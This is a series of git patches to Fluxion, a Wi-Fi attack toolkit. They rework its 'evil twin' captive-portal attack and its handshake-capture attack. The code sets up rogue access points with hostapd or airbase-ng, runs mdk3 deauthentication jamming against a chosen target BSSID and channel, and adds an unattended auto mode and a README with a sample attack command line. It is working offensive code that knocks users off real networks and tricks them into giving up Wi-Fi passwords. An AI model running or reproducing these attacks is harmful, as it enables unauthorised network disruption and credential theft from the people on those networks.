$CaptivePortalGatewayAddress:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE @@ -1017,27 +1082,27 @@ captive_portal_set_routes() { captive_portal_stop_interface() { captive_portal_unset_routes - if [ "$APRogueService" ]; then - ap_stop + if [ "$CaptivePortalAPService" ]; then + ap_service_stop fi } captive_portal_start_interface() { - if [ "$APRogueService" ]; then + if [ "$CaptivePortalAPService" ]; then echo -e "$FLUXIONVLine $CaptivePortalStaringAPServiceNotice" - ap_start + ap_service_start else fluxion_header echo -e "$FLUXIONVLine Configuration for external access point device:" echo - fluxion_target_show "$APRogueSSID" "OPEN" "$FluxionTargetChannel" "$APRogueMAC" "$FluxionTargetMaker" + fluxion_target_show - echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalVIGWAddress%.*}.2/24" + echo -e "$FLUXIONVLine IPv4 Address: ${CaptivePortalGatewayAddress%.*}.2/24" echo -e "$FLUXIONVLine IPv6 Address: Disabled" - echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalVIGWAddress" - echo -e "$FLUXIONVLine DNS Server: $CaptivePortalVIGWAddress" + echo -e "$FLUXIONVLine DHCP Server: $CaptivePortalGatewayAddress" + echo -e "$FLUXIONVLine DNS Server: $CaptivePortalGatewayAddress" echo echo -e "$FLUXIONVLine ${CYel}Assure external AP device is available & configured before continuing!${CClr}" @@ -1124,6 +1189,7 @@ prep_attack() { local sequence=( "set_jammer_interface" "set_ap_interface" + "set_ap_service" "set_authenticator" "set_certificate" "set_connectivity" @@ -1196,7 +1262,7 @@ start_attack() { echo -e "$FLUXIONVLine $CaptivePortalStartingDHCPServiceNotice" xterm $FLUXIONHoldXterm $TOPLEFT -bg black -fg "#CCCC00" \ -title "FLUXION AP DHCP Service" -e \ - "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $VIGW 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & + "dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" & # Save parent's pid, to get to child later. CaptivePortalDHCPServiceXtermPID=$! @@ -1221,7 +1287,7 @@ start_attack() { echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk3_blacklist.lst" xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ - "mdk3 $WIMonitor d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index bbf7fb6..46d854e 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -4,6 +4,10 @@ CaptivePortalJammerInterfaceQuery="Select an interface for jamming." CaptivePortalAPInterfaceQuery="Select an interface for the access point." + +CaptivePortalAPServiceQuery="Select an access point service" +CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" +CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalInterfaceQuery="Select an interface for the captive portal." CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." From 9fce798206eaa58e3be4ff313c9b515f5382bebf Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 19 Jan 2018 13:59:15 -0600 Subject: [PATCH 27/45] Fixed interface restoration bug & enhanced notices. --- fluxion | 23 +++++++++++++---------- language/en.sh | 8 +++++--- 2 files changed, 18 insertions(+), 13 deletions(-) diff --git a/fluxion b/fluxion index a59906e..53926eb 100755 --- a/fluxion +++ b/fluxion @@ -240,7 +240,7 @@ fluxion_startup() { sleep 0.1 local -r versionInfo="${CSRed}FLUXION $FLUXIONVersion$CClr" local -r revisionInfo="(rev. $CSBlu$FLUXIONRevision$CClr)" - local -r credits="${CYel}by$CWht FluxionNetwork" + local -r credits="by$CCyn FluxionNetwork$CClr" format_center_literals "$versionInfo $revisionInfo $credits" echo -e "$FormatCenterLiterals" @@ -315,13 +315,10 @@ fluxion_shutdown() { # If allocated interfaces exist, deallocate them now. if [ ${#FluxionInterfaces[@]} -gt 0 ]; then - echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - local interface for interface in "${!FluxionInterfaces[@]}"; do # Only deallocate fluxion or airmon-ng created interfaces. if [[ "$interface" == "flux"* || "$interface" == *"mon"* ]]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $interface$CClr" fluxion_deallocate_interface $interface fi done @@ -680,13 +677,14 @@ fluxion_deallocate_interface() { # Release interfaces # Assure the interface is in the allocation table. if [ ! "$newIdentifier" ]; then return 2; fi - if interface_is_wireless $oldInterface; then - # Unblock interfaces to make them available. - echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" - rfkill unblock all &> $FLUXIONOutputDevice + local interfaceIdentifier=$newIdentifier + echo -e "$CWht[$CSRed-$CWht] "$( + io_dynamic_output "$FLUXIONDeallocatingInterfaceNotice" + )"$CClr" + if interface_is_wireless $oldIdentifier; then # Attempt deactivating monitor mode on the interface. - if interface_set_mode $oldIdentifier managed; then + if ! interface_set_mode $oldIdentifier managed; then return 3 fi fi @@ -727,7 +725,12 @@ fluxion_allocate_interface() { # Reserve interfaces if ! interface_is_real $identifier; then return 2; fi - echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice" + + local interfaceIdentifier=$identifier + echo -e "$CWht[$CSGrn+$CWht] "$( + io_dynamic_output "$FLUXIONAllocatingInterfaceNotice" + )"$CClr" + if interface_is_wireless $identifier; then # Unblock wireless interfaces to make them available. diff --git a/language/en.sh b/language/en.sh index 0062403..7a4286b 100755 --- a/language/en.sh +++ b/language/en.sh @@ -3,9 +3,11 @@ # native: English FLUXIONInterfaceQuery="Select a wireless interface" -FLUXIONAllocatingInterfaceNotice="Starting interface reservation..." -FLUXIONReidentifyingInterface="Renaming interface..." -FLUXIONUnblockingWINotice="Unblocking all wireless interfaces..." +FLUXIONAllocatingInterfaceNotice="Allocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONDeallocatingInterfaceNotice="Deallocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONReidentifyingInterface="Renaming interface." +FLUXIONUnblockingWINotice="Unblocking all wireless interfaces." + #FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." From 890c7199dfbfb86ae8fbea1184d639d3ea1c72f5 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 19 Jan 2018 14:02:43 -0600 Subject: [PATCH 28/45] Added preferences script to git-ignore. --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.gitignore b/.gitignore index e9168d9..53f35c7 100644 --- a/.gitignore +++ b/.gitignore @@ -5,6 +5,8 @@ *.log BullyOutput.txt +/preferences.sh* + # temporary files which can be created if a process still has a handle open of a deleted file .fuse_hidden* From 03850c56a59584fa034770f38d8b3a4fd897277f Mon Sep 17 00:00:00 2001 From: deltax Date: Fri, 19 Jan 2018 21:47:32 +0100 Subject: [PATCH 29/45] Update .gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index 53f35c7..f2500c2 100644 --- a/.gitignore +++ b/.gitignore @@ -3,6 +3,7 @@ *.swo *.cap *.log +*.backup BullyOutput.txt /preferences.sh* From 004fe9abb61dc90fe253f3483dfd9c53345f0088 Mon Sep 17 00:00:00 2001 From: deltax Date: Fri, 19 Jan 2018 21:49:53 +0100 Subject: [PATCH 30/45] Minor auto tweaks --- fluxion | 1 + 1 file changed, 1 insertion(+) diff --git a/fluxion b/fluxion index 53926eb..f4d7e9b 100755 --- a/fluxion +++ b/fluxion @@ -105,6 +105,7 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; + -a|--auto) declare -r FLUXIONTAuto=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; -e|--essid) FluxionTargetSSID=$2; shift;; -c|--channel) FluxionTargetChannel=$2; shift;; From 915fddccd420b484ca8e18a0072962da774ad31e Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 19 Jan 2018 15:53:46 -0600 Subject: [PATCH 31/45] Fixed interface initialization & tweaked defaults. Fixed a bug caused by a failure to initialize interfaces after selection. Tweaked some default values, when using auto-mode. --- attacks/Captive Portal/attack.sh | 128 +++++++++++++++++----------- attacks/Handshake Snooper/attack.sh | 25 ++++-- 2 files changed, 96 insertions(+), 57 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 4e0f64a..c76fb20 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -38,15 +38,27 @@ captive_portal_unset_jammer_interface() { captive_portal_set_jammer_interface() { if [ "$CaptivePortalJammerInterface" ]; then return 0; fi - echo "Running get jammer interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface attack_targetting_interfaces \ - "$CaptivePortalJammerInterfaceQuery"; then - echo "Failed to get jammer interface" > $FLUXIONOutputDevice - return 1 + + if [ ! "$CaptivePortalUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$CaptivePortalJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedJammerInterface + unset CaptivePortalUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 fi echo "Succeeded get jammer interface." > $FLUXIONOutputDevice - CaptivePortalJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + CaptivePortalJammerInterface=${FluxionInterfaces[$selectedInterface]} } captive_portal_ap_interfaces() { @@ -59,33 +71,44 @@ captive_portal_ap_interfaces() { } captive_portal_unset_ap_interface() { - if [ ! "$CaptivePortalAPInterface" ]; then return 1; fi - if [ "$CaptivePortalAPInterface" = \ + if [ ! "$CaptivePortalAccessPointInterface" ]; then return 1; fi + if [ "$CaptivePortalAccessPointInterface" = \ "${CaptivePortalJammerInterface}v" ]; then - if ! iw dev $CaptivePortalAPInterface del \ + if ! iw dev $CaptivePortalAccessPointInterface del \ &> $FLUXIONOutputDevice; then fluxion_conditional_bail "Unable to remove virtual interface!" exit 1 fi fi - CaptivePortalAPInterface="" + CaptivePortalAccessPointInterface="" } captive_portal_set_ap_interface() { - if [ "$CaptivePortalAPInterface" ]; then return 0; fi + if [ "$CaptivePortalAccessPointInterface" ]; then return 0; fi - echo "Running get ap interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface captive_portal_ap_interfaces \ - "$CaptivePortalAPInterfaceQuery"; then - echo "Failed to get ap interface" > $FLUXIONOutputDevice - return 1 + if [ ! "$CaptivePortalUninitializedAccessPointInterface" ]; then + echo "Running get ap interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface captive_portal_ap_interfaces \ + "$CaptivePortalAccessPointInterfaceQuery"; then + echo "Failed to get ap interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedAccessPointInterface + unset CaptivePortalUninitializedAccessPointInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate ap interface" > $FLUXIONOutputDevice + return 2 fi echo "Succeeded get ap interface." > $FLUXIONOutputDevice - CaptivePortalAPInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + CaptivePortalAccessPointInterface=${FluxionInterfaces[$selectedInterface]} # If interfaces are the same, we need an independent virtual interface. - if [ "$CaptivePortalAPInterface" = \ + if [ "$CaptivePortalAccessPointInterface" = \ "$CaptivePortalJammerInterface" ]; then # TODO: Make fluxion's interface services manage virtual interfaces. # Have fluxion_get_interface return a virutal interface if the primary @@ -99,7 +122,7 @@ captive_portal_set_ap_interface() { return 2 fi echo "Virtual interface created successfully." > $FLUXIONOutputDevice - CaptivePortalAPInterface=${CaptivePortalJammerInterface}v + CaptivePortalAccessPointInterface=${CaptivePortalJammerInterface}v fi } @@ -111,14 +134,14 @@ function captive_portal_unset_ap_service() { # Since we're auto-selecting when on auto, trigger undo-chain. if [ "$FLUXIONAuto" ]; then return 2; fi - if ! interface_is_wireless "$CaptivePortalAPInterface"; then + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then return 3; fi } function captive_portal_set_ap_service() { if [ "$CaptivePortalAPService" ]; then return 0; fi - if ! interface_is_wireless "$CaptivePortalAPInterface"; then + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then return 0; fi @@ -264,6 +287,9 @@ captive_portal_run_certificate_generator() { captive_portal_unset_certificate() { if [ ! "$CaptivePortalSSL" ]; then return 1; fi + # WARNING: The server configuration depends on whether the certificate + # file exists and is positioned in the proper location. The check above + # could unsynchronize with the certificate file if we're not careful! sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" @@ -290,7 +316,7 @@ captive_portal_set_certificate() { cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ "$FLUXIONWorkspacePath/server.pem" - CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate + CaptivePortalSSL="enabled" # Enabled if sourcing user certificate echo "Captive Portal certificate was user supplied, skipping query!" \ > $FLUXIONOutputDevice @@ -298,12 +324,7 @@ captive_portal_set_certificate() { fi if [ "$FLUXIONAuto" ]; then - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" - return 2 - fi - CaptivePortalSSL="enabled" + CaptivePortalSSL="disabled" else local choices=( "$CaptivePortalCertificateSourceGenerateOption" @@ -349,6 +370,9 @@ captive_portal_set_certificate() { captive_portal_unset_connectivity() { if [ ! "$CaptivePortalConnectivity" ]; then return 1; fi CaptivePortalConnectivity="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } captive_portal_set_connectivity() { @@ -356,26 +380,30 @@ captive_portal_set_connectivity() { captive_portal_unset_connectivity - local choices=( - "$CaptivePortalConnectivityDisconnectedOption" - "$CaptivePortalConnectivityEmulatedOption" - "$FLUXIONGeneralBackOption" - ) - io_query_choice "$CaptivePortalConnectivityQuery" choices[@] + if [ "$FLUXIONAuto" ]; then + CaptivePortalConnectivity="disconnected" + else + local choices=( + "$CaptivePortalConnectivityDisconnectedOption" + "$CaptivePortalConnectivityEmulatedOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$CaptivePortalConnectivityQuery" choices[@] - case "$IOQueryChoice" in - "$CaptivePortalConnectivityDisconnectedOption") - CaptivePortalConnectivity="disconnected" ;; - "$CaptivePortalConnectivityEmulatedOption") - CaptivePortalConnectivity="emulated" ;; - "$FLUXIONGeneralBackOption") - return 1 - ;; - *) - fluxion_conditional_bail "Unknown connectivity option!" - return 2 - ;; - esac + case "$IOQueryChoice" in + "$CaptivePortalConnectivityDisconnectedOption") + CaptivePortalConnectivity="disconnected" ;; + "$CaptivePortalConnectivityEmulatedOption") + CaptivePortalConnectivity="emulated" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown connectivity option!" + return 2 + ;; + esac + fi } captive_portal_unset_user_interface() { @@ -543,7 +571,7 @@ captive_portal_set_attack() { # AP Service: Prepare service for an attack. if [ "$CaptivePortalAPService" ]; then ap_service_prep \ - "$CaptivePortalAPInterface" \ + "$CaptivePortalAccessPointInterface" \ "$CaptivePortalGatewayAddress" \ "$FluxionTargetSSID" \ "$FluxionTargetRogueMAC" \ @@ -1144,9 +1172,9 @@ fi while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -a|--ap) - CaptivePortalAccessPointInterface=$2; shift;; + CaptivePortalUninitializedAccessPointInterface=$2; shift;; -j|--jammer) - CaptivePortalJammerInterface=$2; shift;; + CaptivePortalUninitializedJammerInterface=$2; shift;; -s|--ssl) CaptivePortalSSLCertificatePath=$2; shift;; -c|--connectivity) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 1f6003c..af806da 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -237,15 +237,26 @@ handshake_snooper_set_jammer_interface() { if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi - echo "Running get jammer interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface attack_targetting_interfaces \ - "$HandshakeSnooperJammerInterfaceQuery"; then - echo "Failed to get jammer interface" > $FLUXIONOutputDevice - return 1 + if [ ! "$HandshakeSnooperUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$HandshakeSnooperJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$HandshakeSnooperUninitializedJammerInterface + unset HandshakeSnooperUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 fi echo "Succeeded get jammer interface." > $FLUXIONOutputDevice - HandshakeSnooperJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + HandshakeSnooperJammerInterface=${FluxionInterfaces[$selectedInterface]} } handshake_snooper_unset_verifier_identifier() { @@ -367,7 +378,7 @@ while [ "$1" != "" -a "$1" != "--" ]; do -i|--interval) HandshakeSnooperVerifierInterval=$2; shift;; -j|--jammer) - HandshakeSnooperJammerInterface=$2; shift;; + HandshakeSnooperUninitializedJammerInterface=$2; shift;; -a|--asynchronous) HandshakeSnooperVerifierSynchronicity="non-blocking";; esac From be08c68bfab41a161258b7fdf8559d98f62d10a5 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sat, 20 Jan 2018 02:44:30 -0600 Subject: [PATCH 32/45] Fixed missing attack parameters bug. --- fluxion | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/fluxion b/fluxion index f4d7e9b..b1e5014 100755 --- a/fluxion +++ b/fluxion @@ -85,7 +85,8 @@ if ! FLUXIONCLIArguments=$( echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi -declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments +AttackCLIArguments=${FLUXIONCLIArguments##*--} +declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============================================================ # @@ -97,7 +98,7 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. [ "$1" != "--" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. -while [ "$1" != "--" ]; do +while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; -d|--debug) declare -r FLUXIONDebug=1;; @@ -105,7 +106,6 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; - -a|--auto) declare -r FLUXIONTAuto=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; -e|--essid) FluxionTargetSSID=$2; shift;; -c|--channel) FluxionTargetChannel=$2; shift;; @@ -1507,6 +1507,13 @@ fluxion_prep_attack() { if [ ! -x "$path/attack.sh" ]; then return 1; fi if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi + # Load attack parameters if any exist. + if [ "$AttackCLIArguments" ]; then + eval set -- "$AttackCLIArguments" + # Remove them after loading them once. + unset AttackCLIArguments + fi + # Load attack and its corresponding language file. # Load english by default to overwrite globals that ARE defined. source "$path/language/en.sh" @@ -1520,7 +1527,7 @@ fluxion_prep_attack() { if ! fluxion_set_attack_target; then return 3; fi fi - if ! prep_attack "$@"; then return 4; fi + if ! prep_attack; then return 4; fi } fluxion_run_attack() { @@ -1554,16 +1561,13 @@ fluxion_run_attack() { # ================= < Argument Executables > ================= # # ============================================================ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. - -while [ "$1" != "--" ]; do +while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; esac shift # Shift new parameters done -shift # Remove "--" to prepare for attacks to read parameters. - # ============================================================ # # ===================== < FLUXION Loop > ===================== # From b980ea21dbaa64ef467fd17344d6eaa17488ef43 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sat, 20 Jan 2018 02:54:55 -0600 Subject: [PATCH 33/45] Fixed clean SSID bug & minor auto-mode bug. The clean SSID wasn't being set when then -e flag was passed. The auto-mode wasn't auto-checking automatically found hash files. --- fluxion | 58 ++++++++++++++++++++++++++++++++++----------------------- 1 file changed, 35 insertions(+), 23 deletions(-) diff --git a/fluxion b/fluxion index b1e5014..c7bdd21 100755 --- a/fluxion +++ b/fluxion @@ -107,7 +107,11 @@ while [ "$1" != "" -a "$1" != "--" ]; do -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; - -e|--essid) FluxionTargetSSID=$2; shift;; + -e|--essid) FluxionTargetSSID=$2; + FluxionTargetSSIDClean=$( + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + shift;; -c|--channel) FluxionTargetChannel=$2; shift;; -l|--language) FluxionLanguage=$2; shift;; -a|--attack) FluxionAttack=$2; shift;; @@ -1276,6 +1280,9 @@ fluxion_hash_verify() { fluxion_hash_unset_path() { if [ ! "$FluxionHashPath" ]; then return 1; fi FluxionHashPath="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } # Parameters: [channel [encryption [maker]]] @@ -1289,35 +1296,40 @@ fluxion_hash_set_path() { # If we've got a default path, check if a hash exists. # If one exists, ask users if they'd like to use it. if [ "$hashPath" -a -f "$hashPath" -a -s "$hashPath" ]; then - local choices=( \ - "$FLUXIONUseFoundHashOption" \ - "$FLUXIONSpecifyHashPathOption" \ - "$FLUXIONHashSourceRescanOption" \ - "$FLUXIONGeneralBackOption" \ - ) + if [ "$FLUXIONAuto" ]; then + FluxionHashPath=$hashPath + return + else + local choices=( \ + "$FLUXIONUseFoundHashOption" \ + "$FLUXIONSpecifyHashPathOption" \ + "$FLUXIONHashSourceRescanOption" \ + "$FLUXIONGeneralBackOption" \ + ) - fluxion_header + fluxion_header - echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" - echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" - echo + echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" + echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" + echo - io_query_choice "" choices[@] + io_query_choice "" choices[@] - echo + echo - case "$IOQueryChoice" in - "$FLUXIONUseFoundHashOption") - FluxionHashPath=$hashPath - return ;; + case "$IOQueryChoice" in + "$FLUXIONUseFoundHashOption") + FluxionHashPath=$hashPath + return ;; - "$FLUXIONHashSourceRescanOption") - fluxion_hash_set_path "$@" - return $? ;; + "$FLUXIONHashSourceRescanOption") + fluxion_hash_set_path "$@" + return $? ;; - "$FLUXIONGeneralBackOption") - return -1 ;; - esac + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi fi while [ ! "$FluxionHashPath" ]; do From 0e6b638d8628125e7ea24a74607350d01ebe895a Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 20 Jan 2018 10:17:44 +0100 Subject: [PATCH 34/45] Create arguments.md --- misc/arguments.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 misc/arguments.md diff --git a/misc/arguments.md b/misc/arguments.md new file mode 100644 index 0000000..5469cf4 --- /dev/null +++ b/misc/arguments.md @@ -0,0 +1,19 @@ +## Arguments table + +| Arguments | Describtion | +| ------------- | ------------- | +| -a | Give a Attack | +| -e | Give a certain essid | +| -b | Give a certain bssid | +| -- | Maker is required | +| -a | Access point interface | +| -j | Jamming interface | +| -x | Use xterm instead of tmux | +| -v | Print version number | +| -d | Run fluxion in debug mode | +| -k | Kill wireless connection if it is connected | +| -m | Run fluxion in manual mode instead of auto | +| -l | Language | + +## Samples +`./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] -- -a [AP INTERFACE] -j [JAMMING INTERFACE]` From 26ecea2a5113045f481e10fb94c95cb9c5f43959 Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 20 Jan 2018 11:57:29 +0100 Subject: [PATCH 35/45] Rename arguments.md to README.md --- misc/{arguments.md => README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename misc/{arguments.md => README.md} (100%) diff --git a/misc/arguments.md b/misc/README.md similarity index 100% rename from misc/arguments.md rename to misc/README.md From 488a8501622dd7dcecc75ef5aa644a68f33af9d7 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sat, 20 Jan 2018 16:06:45 -0600 Subject: [PATCH 36/45] Added tracker selection, and other minor bug fixes. Added tracker selection to fluxion, querying an interface for tracking. Fixed a bug where auto-mode was activating on manual mode (no flags). Added skip option to the generic interface selection function. Reidentified some targetting subroutines following the convention. Corrected an outdated language global. Added the general skip option. --- attacks/Captive Portal/attack.sh | 9 + attacks/Captive Portal/language/en.sh | 2 +- fluxion | 271 ++++++++++++++++---------- language/en.sh | 3 + 4 files changed, 183 insertions(+), 102 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index c76fb20..1696c66 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1201,6 +1201,15 @@ attack_targetting_interfaces() { done } +attack_tracking_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done + echo "" # This enables the Skip option. +} + unprep_attack() { CaptivePortalState="Not Ready" diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index 46d854e..fd480a6 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -3,7 +3,7 @@ # description: Creates an "evil twin" access point. CaptivePortalJammerInterfaceQuery="Select an interface for jamming." -CaptivePortalAPInterfaceQuery="Select an interface for the access point." +CaptivePortalAccessPointInterfaceQuery="Select an interface for the access point." CaptivePortalAPServiceQuery="Select an access point service" CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" diff --git a/fluxion b/fluxion index c7bdd21..57c10cf 100755 --- a/fluxion +++ b/fluxion @@ -96,7 +96,7 @@ declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -[ "$1" != "--" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. +[ "$1" != "" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in @@ -865,7 +865,7 @@ fluxion_allocate_interface() { # Reserve interfaces # as the key for the global FluxionInterfaces hash/map/dictionary. } -# Parameters: +# Parameters: [] # Note: The interfaces lambda must print an interface per line. # ------------------------------------------------------------ # # Return -1: Go back @@ -880,30 +880,35 @@ fluxion_get_interface() { fi while true; do - local interfacesAvailable - readarray -t interfacesAvailable < <($1) + local candidateInterfaces + readarray -t candidateInterfaces < <($1) + local interfacesAvailable=() local interfacesAvailableInfo=() local interfacesAvailableColor=() local interfacesAvailableState=() # Gather information from all available interfaces. - local interfacesAvailableCount=${#interfacesAvailable[@]} + local candidateInterface + for candidateInterface in "${candidateInterfaces[@]}"; do + if [ ! "$candidateInterface" ]; then + local skipOption=1 + continue + fi - local i - for (( i = 0; i < interfacesAvailableCount; i++ )); do - local interfaceCandidate=${interfacesAvailable[i]} - - interface_chipset "$interfaceCandidate" + interface_chipset "$candidateInterface" interfacesAvailableInfo+=("$InterfaceChipset") # If it has already been allocated, we can use it at will. - local interfaceCandidateAlt=${FluxionInterfaces["$interfaceCandidate"]} - if [ "$interfaceCandidateAlt" ]; then - interfacesAvailable[$i]=$interfaceCandidateAlt + local candidateInterfaceAlt=${FluxionInterfaces["$candidateInterface"]} + if [ "$candidateInterfaceAlt" ]; then + interfacesAvailable+=("$candidateInterfaceAlt") + interfacesAvailableColor+=("$CGrn") interfacesAvailableState+=("[*]") else - interface_state "$interfaceCandidate" + interfacesAvailable+=("$candidateInterface") + 